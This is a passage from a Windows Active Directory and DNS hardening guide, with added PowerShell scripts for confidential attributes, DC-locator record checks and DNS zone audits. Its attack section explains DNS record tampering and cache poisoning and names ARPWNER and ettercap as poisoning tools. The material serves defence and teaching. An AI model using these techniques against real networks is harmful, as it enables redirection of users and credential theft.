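        Status  = $(if ($changed) { 'UPDATED' } else { 'UNCHANGED' })
        Changes = ((@($replace.Keys) + $clear) -join ',')
    }
}

# -Delimiter ';' makes the separator explicit whatever the locale of the
# machine running the scheduled task.
$report = Import-Csv -Path $csvPath -Delimiter ';' | ForEach-Object { Update-UserFromHr -Row $_ }
$report | Format-Table -AutoSize
```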

1.4.2 SYNCHRONIZING AZURE ACTIVE DIRECTORY WITH ACTIVE DIRECTORY

Take the example of a company that wants to migrate to the Office 365 Enterprise E3 plan. This offer is in fact based on the following 6
products, all of which rely on a directory called Azure Active Directory (a mix between a standard Active Directory and an Active Directory
Lightweight Directory Services directory):

• Exchange Online: users have a 50GB mailbox with all the collaboration features of Exchange Server 2013. With the Office 365 Plan E3
license, users have unlimited email archiving. Users can encrypt / sign their mail with S/MIME or rely on the Azure Active Directory Rights
Management solution for secure email exchanges.

• Lync Online: users have the presence, instant messaging, audio conferencing and video conferencing features of Lync Server 2013.

• SharePoint Online: users have 1TB of online storage space that they can synchronize with their workstation using the OneDrive for
Business client (formerly SharePoint Workspace and SkyDrive Pro). Users can also have all types of SharePoint 2013 sites (collaborative
intranet, team sites). Office 365 secures all SharePoint data with Azure Active Directory Rights Management (based on Rights Management
Services).

• Azure Active Directory Rights Management: Office 365 Plan E3 includes the functionality of Active Directory Rights Management Services.
This solution allows you to encrypt / sign your documents, prevent documents from leaving your business, and block features such as
copy / paste, printing or editing of your documents. For more information, see the following article: http://technet.microsoft.com/fr-fr/library/jj585026.aspx

• Yammer Enterprise: Microsoft recently purchased this enterprise social network solution. You can see Yammer as a kind of Facebook for
business (creating events, link sharing, polls, creating groups, file sharing, conversations, articles). For more information, see http://www.zdnet.com/yammer
.

• Office 365 ProPlus: this is a special version of Office 2013 Professional. This version requires an Office 365 account to activate (periodic
activation every 30 days) and uses a new streaming deployment system called Click-to-Run. For more information, see http://technet.microsoft.com/e

• Applications for mobile devices / tablets: Microsoft makes all the tools of the Office 365 suite (Outlook Web Access, Lync, Word, Excel ...)
available on mobile devices and tablets. Users can download Office 365 ProPlus from Office 365 on their iPad / iPhone.

Administrators generally want:

• The information held in Active Directory, such as the user's telephone number and email address, to be replicated to the Azure Active
Directory directory, so that it is available from clients such as Outlook and Lync.

• To define which resources (user accounts / groups) are replicated to Azure Active Directory.
• To prevent some information (confidential attributes) from replicating to the Azure Active Directory directory.

• Users to connect to Office 365 with their Active Directory login / password.

• To see all the resources of their directory in the Office 365 management interfaces (Office 365 portal or Office 365 PowerShell modules).
Example: a user called melanie.mathieu was created in Active Directory. You now want to assign an Office 365 Enterprise Plan E3 license to
this user so that she can connect to the Office 365 services.

These actions are possible with synchronization tools such as Azure Active Directory Sync
(AD-SYNC, http://www.microsoft.com/en-us/download/details.aspx?id=44225 ). This tool is actually based on the Forefront Identity
Manager 2010 engine. It allows you to:

• Define which directory resources are replicated by selecting the OUs allowed to replicate.

• Define which user objects are replicated based on the value of one or more attributes.

• Optionally replicate the user password to the Azure Active Directory directory. This partly avoids the use of an identity federation protocol,
but a hash derived from the user's password hash is copied to the Azure Active Directory directory. This could pose security problems,
even though Microsoft states that no mathematical function can recover the Active Directory user account password hash from the version
of the hash copied to Azure Active Directory.

1.4.3 HOSTING THE ENTERPRISE DATA IN THE ACTIVE DIRECTORY

Out of the box, Active Directory has many attributes to host user data. I invite you to read the article http://msdn.microsoft.com/en-us/library/ms683980(v=vs.85).aspx
detailing the fields available in the base Active Directory schema (after deployment of the first domain controller). If you need more attributes,
you can prepare the Active Directory schema for Exchange 2013 (this does not require the purchase of Exchange 2013 licenses). This schema
extension will allow you to use the following attributes to host your data on user account objects:

• extensionAttribute1
• extensionAttribute2
• ...
• extensionAttribute15
• msExchExtensionCustomAttribute1
• ...
• msExchExtensionCustomAttribute5

The extensionAttribute attributes are of type string. Their LDAPDisplayName begins with extensionAttribute (example: extensionAttribute1)
but their adminDisplayName starts with ms-Exch-Extension-Attribute- (example: ms-Exch-Extension-Attribute-1).

The msExchExtensionCustomAttribute attributes are multi-valued and hold up to 1300 entries of type string.

Other attributes appear to be available, such as msDS-cloudExtensionAttribute1 to msDS-cloudExtensionAttribute20 and
msExchExtensionAttribute16 to msExchExtensionAttribute45. However, Microsoft does not recommend using them because they are reserved
for future use.

To deploy the Exchange 2013 schema extension:

1. Confirm that your Active Directory backups work properly.
2. Disable real-time antivirus on the domain controller holding the schema master role.
3. Log in with a user who is a member of the groups Schema Admins and Enterprise Admins. Download the Exchange 2013 installation at: http://technet.microsoft.com/fr
. Double-click the file and extract the installation sources into C:\_adm\sources\Exchange2013 on the domain controller holding the Active
Directory schema master role.
4. Disable inbound / outbound replication of this domain controller with the following commands (in the example below SRV2012R2 is the
name of the domain controller holding the schema master role):

repadmin /options SRV2012R2 +DISABLE_OUTBOUND_REPL
repadmin /options SRV2012R2 +DISABLE_INBOUND_REPL

5. Launch the PowerShell command prompt as an administrator and run the following command:

C:\_adm\sources\Exchange2013\setup.exe /PrepareSchema /IAcceptExchangeServerLicenseTerms

6. Once the schema update is complete, validate that the domain controller works properly. Re-enable inbound / outbound replication on the
domain controller holding the schema master role by entering the following commands:

repadmin /options SRV2012R2 -DISABLE_OUTBOUND_REPL
repadmin /options SRV2012R2 -DISABLE_INBOUND_REPL

This procedure should be tested and validated on a copy of the production environment before applying it to production.


1.4.4 HOW AND WHO SHOULD ADMINISTER THESE ATTRIBUTES?

Administration consoles such as Active Directory Users and Computers do not display the values of all the available attributes, and it is not
possible to change this behavior. Since Windows 2008 R2, you have an Attribute Editor tab in the Active Directory Administrative Center
console and in the Active Directory Users and Computers console (with the Advanced Features view mode).

You also have a PowerShell module with Windows 2008 R2 domain controllers to manage the contents of your Active Directory. If your domain
controllers are older than Windows 2008 R2, I invite you to use the Dell ActiveRoles Management Shell 1.6 PowerShell module (free),
downloadable at the following address: http://software.dell.com/frfr/trials/#a . It will be necessary to deploy .Net Framework 3.5 on the
administrative machine.

You can also use HTA files. These files provide an HTML interface that you pair with VBSCRIPT code. The website http://bbil.developpez.com/tutoriel/vbs/int
provides a basis for developing your own HTA scripts.

Example of a self-service interface (allowing users to update their own information): http://community.spiceworks.com/scripts/show/626-active-directory-user-editor-h

Example administration interface for Active Directory administrators:
http://community.spiceworks.com/scripts/show/573-aduc-update-utility


Example interface for the teams responsible for resetting passwords:
http://www.bestintexas.com/Scripting/

These tools thus make it possible to delegate, if necessary, the administration of directory data to non-IT staff. We will see later in this
document how to delegate administrative rights to those users.

1.4.5 PROTECTING ATTRIBUTES THAT CONTAIN SENSITIVE DATA

By default the group Authenticated Users has read-only access to all non-system attributes of a user account. How can only certain users /
groups be allowed to read the value of an attribute containing confidential data?

Microsoft defines an attribute as confidential by adding the decimal value 128 to the searchFlags attribute of the attribute object in the Active
Directory schema partition. Note that in the Active Directory schema partition, Active Directory attributes (such as the GivenName attribute,
which is the first name field) are objects that themselves have attributes. I invite you to read this Microsoft Knowledge Base article, which
presents this feature: http://support.microsoft.com/kb/922836/en-us

This action cannot be performed on base schema attributes (those whose systemFlags attribute contains 0x10).
http://windowsitpro.com/active-directory/using-confidentiality-bit-hide-data-active-directory
In the example below we set the attributes extensionAttribute1 and EmployeeNumber as confidential attributes.

Check that the attribute systemFlags is set to 0x0 and add the value 128 to the attribute searchFlags. With ADSIEDIT.MSC we enter the
decimal value (128) and it is then displayed in hexadecimal in the ADSIEDIT.MSC GUI. If we try this with a base attribute, it fails (the
attribute systemFlags contains 0x10).

Launch the Active Directory Schema console and set the attribute EmployeeNumber as indexed (to optimize searches that rely on this
attribute). You can see that the searchFlags attribute is updated while keeping the confidentiality setting (going from 0x80 to 0x81).

To launch the Active Directory Schema console, enter the command regsvr32 schmmgmt.dll, create a blank MMC and add the Active
Directory Schema snap-in.
The attribute extensionAttribute1 is displayed with its adminDisplayName. You therefore find ms-Exch-Extension-Attribute-1 in the
ADSIEDIT.MSC console. The systemFlags attribute of ms-Exch-Extension-Attribute-1 (extensionAttribute1) has no value: this is not a base
attribute. Its searchFlags attribute, on the other hand, has the value 17 (decimal). For this attribute to remain indexed and copied when the
Helpdesk uses the Copy user account function, you must add the value 128 (decimal) to the existing value 17 (decimal), giving 145 (decimal).

If the value 1234 is set in the EmployeeNumber of the melanie.mathieu account, a standard user does not see this value, while a domain
administrator sees it.

1.4.6 ALLOWING A USER TO VIEW THE VALUE OF A PROTECTED ATTRIBUTE

Now that the attribute extensionAttribute1 is configured as a confidential attribute, we want the user account tigrou.mathieu (standard user)
and the domain administrators to be able to read it. Other accounts must not be able to read the value of this attribute. You must use the
LDP.EXE tool and connect to the directory.

1. Go to the OU Techdays, right click and select Advanced | Security descriptor. Click on Add ACE.
2. Type tigrou.mathieu in the Trustee field.
3. Check the boxes Control Access and Inherit.
4. Select extensionAttribute1 - attribute in the Object Type field.
5. Select user in the Inherited object type field.
The tigrou.mathieu account must be a member of the group GDL_ViewExtensionAttribute1.
Log in with the account tigrou.mathieu and check that it can now see the extensionAttribute1 of the melanie.mathieu account (located in the
OU Techdays).

Note:
The attributes that store Active Directory passwords are covered by yet another type of protection.
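Sections 1.4.5 and 1.4.6 scripted, as an added PowerShell example that is not part of the original document: it sets the confidentiality bit (0x80) on searchFlags only after checking the attribute is not a base schema attribute (systemFlags 0x10), keeping existing bits (17 becomes 145), then adds the Control Access ACE for user objects under the Techdays OU that the LDP.EXE steps create by hand. The attribute, group and OU names come from the text; Schema Admins membership is assumed.

```powershell
# Added example (not from the original document): mark an attribute as
# confidential and grant a group the Control Access right on it for user
# objects. Assumptions: Schema Admins membership, ActiveDirectory module;
# GDL_ViewExtensionAttribute1 and OU=Techdays come from the text.
Import-Module ActiveDirectory

$rootDse      = Get-ADRootDSE
$schemaNC     = $rootDse.schemaNamingContext
$schemaMaster = (Get-ADForest).SchemaMaster

function Get-SchemaObject {
    param([string]$LdapDisplayName)
    Get-ADObject -SearchBase $schemaNC -Server $schemaMaster `
        -Filter "lDAPDisplayName -eq '$LdapDisplayName'" `
        -Properties searchFlags, systemFlags, schemaIDGUID
}

function Set-ConfidentialAttribute {
    param([string]$LdapDisplayName)
    $attr = Get-SchemaObject -LdapDisplayName $LdapDisplayName
    if (-not $attr) { throw "Attribute $LdapDisplayName not found in the schema" }
    # Base schema attributes (systemFlags 0x10) cannot be made confidential.
    if (([int]$attr.systemFlags -band 0x10) -ne 0) {
        throw "$LdapDisplayName is a base schema attribute; the confidentiality bit cannot be set"
    }
    $old = [int]$attr.searchFlags
    $new = $old -bor 0x80        # keep existing bits (e.g. 17 -> 145), add CONFIDENTIAL
    if ($new -ne $old) {
        Set-ADObject -Identity $attr.DistinguishedName -Server $schemaMaster -Replace @{ searchFlags = $new }
    }
    [pscustomobject]@{ Attribute = $LdapDisplayName; OldSearchFlags = $old; NewSearchFlags = $new }
}

function Grant-ConfidentialAttributeRead {
    param([string]$LdapDisplayName, [string]$GroupName, [string]$TargetDN)
    $attrGuid = [Guid](Get-SchemaObject -LdapDisplayName $LdapDisplayName).schemaIDGUID
    $userGuid = [Guid](Get-SchemaObject -LdapDisplayName 'user').schemaIDGUID
    $sid  = (Get-ADGroup -Identity $GroupName).SID
    $path = 'AD:\' + $TargetDN
    $acl  = Get-Acl -Path $path
    # Control Access (ExtendedRight) on the attribute GUID, inherited by the
    # descendant user objects: the same ACE as "Control Access" + "Inherit",
    # object type = attribute, inherited object type = user in LDP.
    $rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        $sid,
        [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight,
        [System.Security.AccessControl.AccessControlType]::Allow,
        $attrGuid,
        [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents,
        $userGuid)
    $acl.AddAccessRule($rule)
    Set-Acl -Path $path -AclObject $acl
}

Set-ConfidentialAttribute -LdapDisplayName 'extensionAttribute1'
Set-ConfidentialAttribute -LdapDisplayName 'employeeNumber'
Grant-ConfidentialAttributeRead -LdapDisplayName 'extensionAttribute1' `
    -GroupName 'GDL_ViewExtensionAttribute1' `
    -TargetDN ('OU=Techdays,' + $rootDse.defaultNamingContext)
```

The schema change must be made on the schema master and replicates to the other domain controllers; the ACE, being granted to the group, covers every member without editing the descriptor again.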


1.5 STRENGTHENING THE SECURITY OF THE DNS SERVICE

1.5.1 WHAT IS THE RELATIONSHIP BETWEEN ACTIVE DIRECTORY AND DNS?

The DNS protocol (Domain Name System) was created to resolve fully qualified names (FQDN) to IP addresses (and also IP addresses to
FQDNs, or one FQDN to another FQDN). It is indeed easier to remember a name than an IP address.

Active Directory exports its configuration as DNS entries. Workstations can thus locate domain controllers by performing DNS queries.

Example with the machine SRV2012C (192.168.1.112) and an Active Directory domain msreport.be which has 2 Active Directory sites called
Maillot and Meudon:

When the machine srv2012c joined the Active Directory domain msreport.be, it did not yet know its Active Directory site. It therefore connects
to a domain controller regardless of its network location by resolving the DNS entry _ldap._tcp.msreport.be. In our case the domain has 2
domain controllers, srv2012a.msreport.be and srv2012b.msreport.be. The DNS server has a feature called Round Robin (in the properties of
the DNS server) that lets it pick a DNS entry at random when multiple entries exist.

Once the machine srv2012c has found a domain controller, it looks for the Active Directory site it belongs to. For this, it computes its subnet
address and sends that information to the domain controller. The domain controller determines the Active Directory site the workstation
belongs to using the Active Directory site configuration (Maillot in this example) and returns the Active Directory site name to the machine.
Srv2012c then resolves the DNS entry _ldap._tcp.Maillot.msreport.be (again using the DNS round robin feature) because Maillot is the site
attached to the IP subnet 192.168.1.0/24. SRV2012C stores the name of the Active Directory site in the registry entry DynamicSiteName under
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters.

For more information, see http://blogs.technet.com/b/arnaud_jumelet/archive/2010/07/11/domaincontroller-locator-in-depth.aspx .


Domain controllers use CNAME entries in _msdcs.msreport.be to locate other domain controllers. The name of each of these entries is actually
the GUID of the domain controller.
The CNAME DNS entry resolves the name GUID._msdcs.msreport.be to the FQDN of the domain controller. This FQDN is then resolved to an IP
address, which allows the domain controller srv2012a.msreport.be to replicate with the domain controller srv2012b.msreport.be.
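A check of the records described in this section, as an added PowerShell example that is not part of the original document: for every domain controller it verifies the generic SRV record, the site-specific SRV record under _sites and the GUID CNAME in _msdcs, and it reads the site cached in DynamicSiteName on the local machine. It assumes the ActiveDirectory and DnsClient modules, a single-domain forest so that _msdcs sits under msreport.be, and uses the GUID of the domain controller's NTDS Settings object, which is the GUID the CNAME is named after.

```powershell
# Added example (not from the original document): verify the DNS records the
# DC locator and replication depend on. Assumptions: ActiveDirectory and
# DnsClient modules; single-domain forest msreport.be as in the text.
Import-Module ActiveDirectory

function Test-DcLocatorRecords {
    param([string]$DomainName = 'msreport.be')
    $dcs = Get-ADDomainController -Filter * -Server $DomainName
    foreach ($dc in $dcs) {
        $fqdn = $dc.HostName.ToLower()
        $site = $dc.Site

        # Generic SRV record: used by a machine that does not know its site yet.
        $generic = Resolve-DnsName -Name "_ldap._tcp.$DomainName" -Type SRV -ErrorAction SilentlyContinue |
                   Where-Object { $_.NameTarget -eq $fqdn }
        # Site-specific SRV record: used once the site is known.
        $siteRec = Resolve-DnsName -Name "_ldap._tcp.$site._sites.$DomainName" -Type SRV -ErrorAction SilentlyContinue |
                   Where-Object { $_.NameTarget -eq $fqdn }
        # GUID CNAME in _msdcs: used by the other domain controllers for
        # replication. The name is the GUID of the NTDS Settings object.
        $ntds  = Get-ADObject -Identity $dc.NTDSSettingsObjectDN -Properties objectGUID
        $cname = Resolve-DnsName -Name "$($ntds.objectGUID)._msdcs.$DomainName" -Type CNAME -ErrorAction SilentlyContinue |
                 Where-Object { $_.NameHost -eq $fqdn }

        [pscustomobject]@{
            DomainController = $fqdn
            Site             = $site
            GenericSrv       = [bool]$generic
            SiteSrv          = [bool]$siteRec
            MsdcsCname       = [bool]$cname
        }
    }
}

function Get-CachedSiteName {
    # Site the DC locator cached on this machine (DynamicSiteName).
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters'
    (Get-ItemProperty -Path $key -Name DynamicSiteName -ErrorAction SilentlyContinue).DynamicSiteName
}

Test-DcLocatorRecords | Format-Table -AutoSize
Get-CachedSiteName
```

A domain controller showing $false in any column is one that workstations or the other domain controllers cannot locate through that path, which is exactly the condition the DNS attacks of 1.5.3 aim to create.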

1.5.2 DNS DYNAMIC UPDATE

1.5.2.1 The principle of operation

These DNS entries are dynamically updated by the domain controllers using the DNS dynamic update feature. The NETLOGON service on each
domain controller registers the DNS entries listed in the file c:\windows\system32\config\netlogon.dns.

Each domain controller also registers its hostname in the DNS zone corresponding to its primary DNS suffix (the name of the domain by
default) every 5 minutes. It is possible to force the registration manually by typing ipconfig /registerdns.

In practice, all Windows machines try to create / update a DNS entry matching the machine name and the primary DNS suffix.

The primary DNS suffix of the machine defaults to the DNS name of the Active Directory domain.

Do not uncheck Change primary DNS suffix when domain membership changes. This would cause very serious problems. Indeed, when you
type ping srv2012c, the system actually pings srv2012c.msreport.be (it appends the primary DNS suffix).


By default, machines register their name concatenated with their DNS suffix because the box Register this connection's addresses in DNS is
checked by default in the advanced TCP/IP properties of the network adapter (DNS tab).

For information, Microsoft blocks dynamic DNS registration when the DNS suffix is the root zone or a top-level domain (e.g. fr.). This prevents
workgroup workstations from trying to perform dynamic DNS updates in this type of DNS zone.


1.5.2.2 Lessons learned on DNS dynamic update

A customer had problems with the values of type A DNS entries (FQDN resolved to an IP). Printers and workstations at the customer used
DHCP. Each floor of the customer's premises had a VLAN (dedicated IP range).

Description of the problem:

Some DNS entries for printers and workstations resolved to the old IP address of the machine. This problem arose when:

• Case 1: the Active Directory computer account of a Windows workstation was deleted and recreated.

• Case 2: a printer / non-Windows machine was moved between VLANs (same DHCP server).
• Case 3: a printer / non-Windows machine was moved between two sites (change of DHCP server).

• Case 4: someone had manually created the DNS entry of a workstation / printer.

• Case 5: the DHCP server had recently been changed (migration from Windows 2003 to Windows 2012 R2).

The DNS zone msreport.be was directory-integrated and configured to allow secure dynamic DNS updates only (Secure Only).

Where was the problem?

It was simply a permissions problem on the DNS entries! When a DNS zone is integrated into Active Directory, DNS entries become objects
(like user accounts) of type dnsNode.

These objects have permissions. To be able to update the IP address of a type A DNS entry (type Host, name resolved to an IP), you must
have the Write right on the DNS entry (the dnsNode object).

Who has the right to update a DNS entry?


When you manually create a DNS entry, it is the user account that created the entry that has the right to write it.

For machines that obtain an IP address via DHCP, it depends on the DHCP server configuration. Depending on the case, it is the DHCP server
computer account, the DHCP client computer account or a specific user account (configured on the DHCP server) that has the right to change
the DNS entry.

How to determine who has the right to change a DNS entry?

Open the DNS console. Click on the View menu, then select Advanced.
When you now double-click a DNS entry, you see the creation date of the record (if the DNS entry was created dynamically) and a Security tab
(permissions on the object).

How to set who can modify a dynamically created DNS entry?

To set this up, open the DHCP console, go to the DHCP server properties and open the DNS tab.

1. If you select Dynamically update DNS records only if requested by the DHCP clients, Windows DHCP clients create their DNS entry
themselves. It is then the computer account of the Windows machine that has the right to change the DNS entry. For other machines (which
cannot perform secure DNS dynamic update), it is the DHCP server computer account or a specific user account. In our example, the DHCP
server was configured to perform DNS dynamic updates with an account called Dhcp_update. This configuration is done in the DNS tab of
the IPv4 and IPv6 properties of the DHCP server.

2. If you select Always dynamically update DNS records, it is the computer account of the DHCP server or a specific user account that has the
right to change the DNS entries.

The use of a user account for the dynamic DNS updates made by the DHCP server is configured in the Advanced tab of the DHCP server
properties. Click on Credentials. See the Microsoft article http://support.microsoft.com/kb/282001/en-us


Configuration recommendation:
All DHCP servers must have the same configuration (Microsoft DHCP). Configure the DHCP server with Dynamically update DNS records only
if requested by the DHCP clients.

Never delete workstation computer accounts (reset them if needed). Configure the DHCP server to perform dynamic DNS updates with a
service account. See the Microsoft article: http://support.microsoft.com/kb/282001/en-us . On the DNS server, at the level of the DNS zone
msreport.be, give the special account (DHCP_Update) the Read and Modify rights on all DNS entries. Click on the Advanced tab: the
permission must be set so that it applies to This object and all descendant objects.


For the DNS entries causing problems, delete them and recreate them with the command ipconfig /registerdns.

Additional information on the DHCP Client and DNS Client services:

The DHCP Client service should never be stopped, even if the machine has a FIXED IP address! This service makes it possible to obtain an
address from a DHCP server, but it also performs the dynamic DNS updates. If you disable the DHCP Client service on a domain controller, the
NETLOGON service cannot create / modify SRV entries such as _ldap._tcp.msreport.be. When the DHCP Client service is stopped, the message
Error: The system cannot find the file specified appears when running ipconfig /registerdns. The DNS Client service only manages the DNS
cache functionality. For more information:

http://support.microsoft.com/kb/264539/en-us
http://support.microsoft.com/kb/306602/en-us
http://support.microsoft.com/kb/318803/en-us
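The permission check this section describes, done for a whole zone at once, as an added PowerShell example that is not part of the original document: it reads the ACL of every dnsNode object of the AD-integrated zone msreport.be, records the owner and the explicit trustees with write rights, and lists the records written by something other than a computer account or the Dhcp_update account (the manual creations of case 4). It assumes the ActiveDirectory module and a zone replicated to DomainDnsZones; $zoneDN must be adjusted for a zone stored in ForestDnsZones.

```powershell
# Added example (not from the original document): who can write each A record
# (dnsNode object) of an AD-integrated zone. Assumptions: ActiveDirectory
# module; zone msreport.be stored in DomainDnsZones; Dhcp_update as in the text.
Import-Module ActiveDirectory

$domainDN = (Get-ADDomain).DistinguishedName
$zoneName = 'msreport.be'
$zoneDN   = "DC=$zoneName,CN=MicrosoftDNS,DC=DomainDnsZones,$domainDN"

function Get-DnsNodeWriters {
    param([string]$ZoneDistinguishedName)
    $writeRights = [int][System.DirectoryServices.ActiveDirectoryRights]::WriteProperty -bor
                   [int][System.DirectoryServices.ActiveDirectoryRights]::GenericWrite -bor
                   [int][System.DirectoryServices.ActiveDirectoryRights]::GenericAll

    Get-ADObject -SearchBase $ZoneDistinguishedName -SearchScope OneLevel `
                 -Filter "objectClass -eq 'dnsNode'" |
    ForEach-Object {
        $acl = Get-Acl -Path ('AD:\' + $_.DistinguishedName)
        # Explicit (non-inherited) Allow ACEs identify who registered or
        # manually created the record; inherited ACEs come from the zone.
        $writers = $acl.Access |
            Where-Object { $_.AccessControlType -eq 'Allow' -and
                           -not $_.IsInherited -and
                           (([int]$_.ActiveDirectoryRights -band $writeRights) -ne 0) } |
            ForEach-Object { $_.IdentityReference.Value } |
            Sort-Object -Unique
        [pscustomobject]@{
            Record  = $_.Name
            Owner   = $acl.Owner
            Writers = ($writers -join '; ')
        }
    }
}

# Candidates for case 4: records whose explicit writer is neither a computer
# account (name ending in $) nor the DHCP update account.
Get-DnsNodeWriters -ZoneDistinguishedName $zoneDN |
    Where-Object { $_.Writers -notmatch 'Dhcp_update' -and $_.Writers -notmatch '\$' } |
    Format-Table -AutoSize
```

A record whose writer is a computer account that no longer exists (case 1) or the previous site's DHCP account (case 3) shows up with an unresolved SID in the Writers column.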

1.5.3 WHAT ARE THE POSSIBLE ATTACKS ON THE DNS SERVICE?

An attacker can disrupt the operation of the directory (replication) by altering the DNS entries that allow workstations to locate their domain
controller and the enterprise servers, and that allow each domain controller to replicate with the other domain controllers.

Example of an attack based on DNS:

The company Msreport has an Apache web server reachable at https://www.msreport.be. Users access the company website with Internet
Explorer and authenticate with their login / password. As the website uses HTTPS with basic authentication, the login / password does not
travel in the clear. If the attacker is able to change the DNS entry www.msreport.be in the DNS zone, he can eventually recover the users'
login / password. The only limitation of this attack is that the certificate will not be valid: the user will see a warning message in Internet
Explorer.

More sophisticated attacks allow an attacker to pollute the DNS cache of a DNS server or of a DNS client. Indeed, when a machine performs a
name resolution, it stores the result in its cache. The cache can be displayed with the command ipconfig /displaydns and purged with the
command ipconfig /flushdns.
The DNS server also has a cache in which it stores the DNS responses returned by other DNS servers (DNS entries for which it is not
authoritative).

To clear the cache of a DNS server, open the DNS console, go to the DNS server properties and select Clear Cache.

If an attacker manages to insert a DNS entry into the DNS server's cache, he can redirect a user to a machine he controls.

1.5.4 SECURING YOUR DNS SERVERS

You should deploy the DNS service on all Active Directory domain controllers because, as seen previously, Active Directory relies on DNS to
allow clients to locate a domain controller. To secure a DNS server, the following actions must be performed:

• Integrate all DNS zones in Active Directory and set DNS dynamic update to Secure Only.

• Do not allow zone transfers to any server and protect zone transfers with the IPsec protocol.

• Protect the cache against pollution.

• Enable DNSSEC on all DNS zones.

1.5.4.1 Integrate DNS zones in Active Directory and enable secure dynamic update DNS

All DNS zones must be integrated into Active Directory. DNS zones then become dnsZone objects and DNS entries become dnsNode objects
that replicate to all domain controllers. If you have multiple domains in the Active Directory forest, it is advisable to store the DNS zones in
ForestDnsZones (Choose how you want zone data to be replicated: To all DNS servers running on domain controllers in this forest:
msreport.be). Zones hosted in the directory partition ForestDnsZones replicate to all domain controllers of the forest that run the DNS service.
In this configuration, all DNS servers have read / write access to the DNS zones.
It is recommended to allow only secure dynamic update, or to disable DNS dynamic update. This configuration lets you set permissions on the
zone and on the DNS entries and ensures that an attacker cannot modify DNS entries.

1.5.4.2 Securing the transfer of DNS zones

Zone transfer is the native DNS mechanism that enables the DNS server(s) hosting the read-only zone (secondary zone) to replicate with the server that hosts the read / write zone (primary zone). It is recommended to protect the replication traffic between servers by enabling IPSEC (configured at the Windows Firewall level or via Group Policy). Zone transfer should also only be permitted from certain servers (those that host a secondary zone). If you want to avoid DNS zones expiring (this often generates production problems), be sure to configure notification: when a change is made in the DNS zone, the DNS server that has the read / write zone notifies the DNS servers that have the read-only zone of the change.

The procedure for enabling IPSec between two DNS servers is explained in detail in this article:
http://technet.microsoft.com/fr-fr/library/ee649192(v=ws.10).aspx

1.5.4.3 Protect the DNS server cache against pollution

How can the cache of a DNS server be polluted?

When a DNS server does not host the DNS zone corresponding to the DNS entry it has to resolve, it uses a DNS forwarder. By default, the Microsoft DNS server queries the DNS root servers. It is possible to configure specific forwarders for specific DNS domains (conditional forwarders) or a forwarder for all domains that the DNS server does not host. In the example below, I have configured the DNS server on my servers to use my LiveBox as DNS forwarder.



An attacker can manage to insert incorrect information (e.g. the FQDN www.microsoft.com resolved to the IP 192.168.0.1 instead of the IP 2.19.95.132) into the cache of a DNS server. This is called DNS cache pollution.

To perform this type of attack, the attacker sends requests to the DNS server for the IP address of www.microsoft.com and at the same time sends answers to the DNS server with an incorrect IP for www.microsoft.com (192.168.0.1).

The DNS server performs a DNS query to its forwarder to get the IP of www.microsoft.com.

The DNS server receives the different answers (good and bad), selects one and adds it to its cache. With any luck, it will select the wrong one. If another client then asks to resolve the FQDN www.microsoft.com, the DNS server checks its cache and returns the wrong information to that client.

Tools like ARPWNER or ettercap allow polluting the cache of a DNS server.
http://www.darknet.org.uk/2013/02/arpwner-arp-dns-poisoning-attack-tool/
http://www.thegeekstuff.com/2012/05/ettercap-tutorial/

How to protect the cache of a Windows DNS server?

1. The DNS response received by the server must have the same 16-bit identifier as the DNS query generated by the DNS server. This protection is native in the DNS protocol.

2. The destination IP address and destination port of the DNS response must match the source IP address and source port of the DNS query sent by the DNS server. This setting corresponds to SocketPoolSize, which is enabled by default on all Windows DNS servers since the discovery of the MS08-037 vulnerability ( https://technet.microsoft.com/library/secu ). The command Dnscmd /Info /SocketPoolSize displays the number of different source ports that the DNS server can use. The command dnscmd /Config /SocketPoolSize 3000 defines a pool of 3,000 different source ports.

For more information on this setting:


http://technet.microsoft.com/fr-fr/library/ee649174(v=ws.10).aspx

3. The option Secure cache against pollution also limits the risk of DNS cache pollution; it is enabled by default in the DNS server properties. I invite you to read the article http://support.microsoft.com/kb/316786 for more information on this option.

4. Windows Server 2008 R2 DNS servers (and later) can block changes to a DNS cache entry for a period of time corresponding to a percentage of the lifetime of the DNS entry (Time To Live or TTL). This setting corresponds to cache locking. A setup procedure is available at this address: http://technet.microsoft.co In the example below, the lifetime of the DNS entry CXCIRSEVEN-PC.msreport.be is 20 minutes.


1.5.4.4 Enable DNSSEC on all DNS zones

The main defect of DNS is that it does not authenticate the client or the DNS server. DNS therefore remains vulnerable to attacks such as DNS cache pollution even when the mechanisms presented in the previous sections are implemented. A new extension of the DNS protocol called DNSSEC has been implemented and makes it possible to truly secure DNS. It is available in the DNS service of Windows 2008 R2 (and later).

DNSSEC is activated at the DNS server level and for each DNS zone. Protected DNS zones appear with a padlock. Microsoft offers a guide to implement DNSSEC:

http://technet.microsoft.com/fr-fr/library/hh831411.aspx

We get the following result.

For more information on DNSSEC:
http://technet.microsoft.com/fr-fr/library/ee649205%28v=ws.10%29.aspx
http://blogs.msmvps.com/vista/2012/11/22/windows-server-2012-signer-vos-zones-avec-dnssec/
http://technet.microsoft.com/fr-fr/library/hh831411.aspx
http://www.labo-microsoft.org/articles/DNSSECPRES/2/Default.asp#_Toc277269110
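As an added example (not part of the original document), the following PowerShell script checks a Windows DNS server against the four recommendations of section 1.5.4 using the DnsServer module (Windows Server 2012 and later). The function names, the computer name parameter and the remediation function are assumptions of this example, not settings from the document.

```powershell
# Added example: audit a Windows DNS server against the hardening points of section 1.5.4.
# Assumes the DnsServer PowerShell module (Windows Server 2012+) and DNS administrator rights.
Import-Module DnsServer

function Test-DnsServerHardening {
    param([string]$ComputerName = $env:COMPUTERNAME)

    $findings = @()

    foreach ($zone in Get-DnsServerZone -ComputerName $ComputerName) {
        # skip the auto-created reverse zones and the stub / forwarder / secondary zones
        if ($zone.IsAutoCreated -or $zone.ZoneType -ne 'Primary') { continue }

        # 1. AD-integrated zone, stored in ForestDnsZones, secure dynamic update only
        if (-not $zone.IsDsIntegrated) {
            $findings += "Zone $($zone.ZoneName): not integrated into Active Directory"
        } elseif ($zone.ReplicationScope -ne 'Forest') {
            $findings += "Zone $($zone.ZoneName): replication scope is $($zone.ReplicationScope), recommended Forest (ForestDnsZones)"
        }
        if ($zone.DynamicUpdate -eq 'NonsecureAndSecure') {
            $findings += "Zone $($zone.ZoneName): nonsecure dynamic update is allowed"
        }

        # 2. zone transfers: none, or only to the secondary servers listed explicitly
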